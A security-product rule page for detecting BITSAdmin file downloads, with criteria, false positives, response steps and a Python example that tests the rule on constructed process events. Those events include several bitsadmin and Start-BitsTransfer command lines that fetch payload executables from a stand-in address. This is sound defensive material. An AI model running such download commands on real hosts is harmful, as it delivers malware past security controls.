BITSAdmin for File Download

Rule added on 30th May, 2024

Rule type:

Correlation

Rule description:

BITSAdmin is the command-line tool for the Background Intelligent Transfer Service (BITS). It is used to create, monitor and manage BITS file transfer jobs (downloads and uploads) in Windows. Administrators use it for transfers over HTTP/HTTPS and to move files to and from SMB shares.

However, adversaries also abuse the tool. It is a signed Microsoft binary present on every Windows installation, so it can be used to download and then execute malicious payloads while blending in with legitimate BITS traffic. Because the transfer is carried out by the BITS service rather than by bitsadmin.exe itself, the job keeps running after the command-line process exits and survives reboots.

Attack chain scenario: Compromised RDP credentials -> Initial access -> Command and Control (C2) establishment -> BITSAdmin for file download -> Malware deployment

Impact:

This can affect an organization in the following ways:

  • Data exfiltration (BITS upload jobs move data out as readily as download jobs bring it in)
  • Bypassing security controls (a trusted, signed system binary whose traffic looks like ordinary BITS activity)
  • Persistence (BITS jobs survive reboots and can be configured to run a command when the transfer completes)

Data source:

Windows > Process Creation

Required configuration: The rule is evaluated on process creation (and termination) events that include the process command line. Prerequisites: install and configure Sysmon (Event ID 1, Process Create), or enable the Audit Process Creation audit policy (Security Event ID 4688) together with the "Include command line in process creation events" setting. Without command-line logging the /transfer and /download checks in the criteria cannot match.

Relevant MITRE ATT&CK techniques and tactics:

Tactic: TA0011- Command and Control

Technique: T1105- Ingress Tool Transfer

Procedure Example- S0190- BITSAdmin

Criteria:

(Process Name ends with BITSAdmin.exe) AND ((Command Line contains /transfer) OR (Command Line contains /download))

BITSAdmin.exe - The command-line client for the BITS service. It creates, monitors and manages BITS jobs, including file downloads and uploads.

/transfer - Creates a job, adds the given remote/local file pairs, starts the job and waits for it to finish, all in one command. By default the job is a download at NORMAL priority; the /priority option can raise it to FOREGROUND.

/download - The job type passed to /transfer or /create to request a download job (the default type; /upload is the alternative).

Note that the same download can be built in steps with /create, /addfile and /resume, and that the PowerShell BitsTransfer cmdlets (Start-BitsTransfer) use the BITS API directly without starting bitsadmin.exe. Neither variant matches this criteria, so pair the rule with coverage for those commands where possible.

When to enable this rule:

Enabling this rule helps you meet the security standard requirement listed below:

Security standards (NIST CSF 2.0):

PR.PS-06: Secure software development practices are integrated, and their performance is monitored throughout the software development life cycle.

When this rule is triggered, you are notified of potential download activity using BITSAdmin.exe. This enables you to review who ran the tool and with what permissions, take corrective measures, and monitor use of the tool for unauthorized activity.

Known false positives: Windows Update, Microsoft 365 Apps and antivirus products rely on the BITS service for updates and file transfers, usually through the BITS API rather than BITSAdmin.exe, but administrative scripts, deployment tools and installers do invoke BITSAdmin.exe directly and will trigger this rule. Microsoft has deprecated BITSAdmin in favor of the BitsTransfer PowerShell cmdlets, so direct invocations should be rare on current systems and the list of legitimate sources is usually short. If required, refine the criteria by excluding known parent process names (match on the full parent path rather than the file name alone) or known destination URLs.
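The following is an added example, not part of the original rule documentation. It runs the criteria above over constructed process-creation events (Sysmon Event ID 1 field names, with the equivalent Security 4688 data) and shows which events match, how a known-benign parent process can be suppressed, and which variants the criteria leaves uncovered (the /create, /addfile, /resume sequence, a renamed copy of the binary, and Start-BitsTransfer). The hardened variant that also keys on Sysmon's OriginalFileName and the extra switches goes beyond the page's rule. All paths, users, URLs and the DeployTool parent process are invented for the example.

```python
"""Evaluate the BITSAdmin file-download criteria over constructed process events."""
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal view of a process-creation record (Sysmon Event ID 1 / Security 4688)."""
    image: str               # Image (4688: NewProcessName), full path of the new process
    command_line: str        # CommandLine, present only when command-line auditing is on
    parent_image: str        # ParentImage (4688: ParentProcessName)
    original_file_name: str  # OriginalFileName from the PE version resource (Sysmon 10+)
    user: str


PAGE_SWITCHES = ("/transfer", "/download")
# Other bitsadmin verbs that also move files but fall outside the page's criteria.
EXTRA_SWITCHES = ("/create", "/addfile", "/resume")
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def matches_page_criteria(ev: ProcessEvent) -> bool:
    """(Process Name ends with BITSAdmin.exe) AND (Command Line contains /transfer OR /download).
    Windows file names and bitsadmin switches are case-insensitive, so compare lowercased."""
    cmd = ev.command_line.lower()
    return _basename(ev.image).endswith("bitsadmin.exe") and any(s in cmd for s in PAGE_SWITCHES)


def matches_hardened_criteria(ev: ProcessEvent) -> bool:
    """Tighter variant (not the page's rule): also accept a renamed copy via
    OriginalFileName and the multi-step verbs /create, /addfile, /resume."""
    cmd = ev.command_line.lower()
    is_bitsadmin = (_basename(ev.image).endswith("bitsadmin.exe")
                    or ev.original_file_name.lower() == "bitsadmin.exe")
    return is_bitsadmin and any(s in cmd for s in PAGE_SWITCHES + EXTRA_SWITCHES)


def extract_remote_urls(command_line: str) -> list:
    """Pull the remote URL(s) out of the command line for triage and blocking."""
    return URL_RE.findall(command_line)


def triage(events, benign_parents=frozenset(), criteria=matches_page_criteria):
    """Return (verdict, event, urls) for each event the criteria matches. Events whose
    parent image (full path, lowercased) is in benign_parents are reported as
    'suppressed' instead of 'alert', the refinement the page suggests for false positives."""
    results = []
    for ev in events:
        if not criteria(ev):
            continue
        verdict = "suppressed" if ev.parent_image.lower() in benign_parents else "alert"
        results.append((verdict, ev, extract_remote_urls(ev.command_line)))
    return results


SYS32 = r"C:\Windows\System32"
# Constructed sample events; 192.0.2.10 and example.com are documentation addresses.
CONSTRUCTED_EVENTS = [
    # 1. Interactive attacker after an RDP logon: one-shot /transfer download of a payload.
    ProcessEvent(rf"{SYS32}\bitsadmin.exe",
                 r"bitsadmin /transfer job1 /download /priority foreground "
                 r"http://192.0.2.10/payload.exe C:\Users\Public\payload.exe",
                 rf"{SYS32}\cmd.exe", "bitsadmin.exe", r"CORP\jsmith"),
    # 2. Same switches in upper case, launched by a hypothetical deployment tool.
    ProcessEvent(rf"{SYS32}\BITSADMIN.EXE",
                 r"BITSADMIN /TRANSFER kb /DOWNLOAD https://updates.example.com/kb.msu C:\Temp\kb.msu",
                 r"C:\Program Files\DeployTool\deploy.exe", "bitsadmin.exe", r"NT AUTHORITY\SYSTEM"),
    # 3-5. Same download built in three steps; none of the page's switches appear.
    ProcessEvent(rf"{SYS32}\bitsadmin.exe", "bitsadmin /create dl",
                 rf"{SYS32}\cmd.exe", "bitsadmin.exe", r"CORP\jsmith"),
    ProcessEvent(rf"{SYS32}\bitsadmin.exe",
                 r"bitsadmin /addfile dl http://192.0.2.10/payload.exe C:\Users\Public\p.exe",
                 rf"{SYS32}\cmd.exe", "bitsadmin.exe", r"CORP\jsmith"),
    ProcessEvent(rf"{SYS32}\bitsadmin.exe", "bitsadmin /resume dl",
                 rf"{SYS32}\cmd.exe", "bitsadmin.exe", r"CORP\jsmith"),
    # 6. Renamed copy of bitsadmin.exe: Image no longer ends with bitsadmin.exe.
    ProcessEvent(r"C:\Users\Public\ba.exe",
                 r"ba /transfer j /download http://192.0.2.10/x.exe C:\Users\Public\x.exe",
                 rf"{SYS32}\cmd.exe", "bitsadmin.exe", r"CORP\jsmith"),
    # 7. PowerShell BITS cmdlet: talks to the BITS service directly, never spawns bitsadmin.exe.
    ProcessEvent(rf"{SYS32}\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -c Start-BitsTransfer -Source http://192.0.2.10/x.exe -Destination C:\Users\Public\x.exe",
                 rf"{SYS32}\cmd.exe", "PowerShell.EXE", r"CORP\jsmith"),
]

if __name__ == "__main__":
    benign = frozenset({r"c:\program files\deploytool\deploy.exe"})
    for verdict, ev, urls in triage(CONSTRUCTED_EVENTS, benign):
        print(f"{verdict:10} {ev.user:20} {ev.parent_image} -> {ev.command_line} urls={urls}")
    print("page criteria hits:    ", sum(matches_page_criteria(e) for e in CONSTRUCTED_EVENTS))
    print("hardened criteria hits:", sum(matches_hardened_criteria(e) for e in CONSTRUCTED_EVENTS))
```

Run as a script, the page's criteria raises one alert (event 1) and suppresses one known-benign transfer (event 2); events 3 to 7 pass it silently, while the hardened variant also flags the three-step sequence and the renamed copy but still cannot see Start-BitsTransfer, which needs its own rule.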

Next steps:

When this alert is triggered, the following measures can be implemented:

  • Identification: Determine whether the alert is a new incident or part of an existing one.
  • Analysis: Analyze the impact and extent of the compromise: the source URL, the downloaded file and its hash, the parent process, and the user and host that ran the command.
  • Response: Respond promptly, for example by initiating an automated workflow that terminates the process. Terminating bitsadmin.exe alone does not stop the transfer, because the job is owned by the BITS service and keeps running; cancel the job itself (for example with bitsadmin /cancel or the Remove-BitsTransfer cmdlet) and quarantine any file it has already written.
  • Permissions: Restrict execution of BITSAdmin.exe to authorized users and services, for example with application control rules such as AppLocker or Windows Defender Application Control.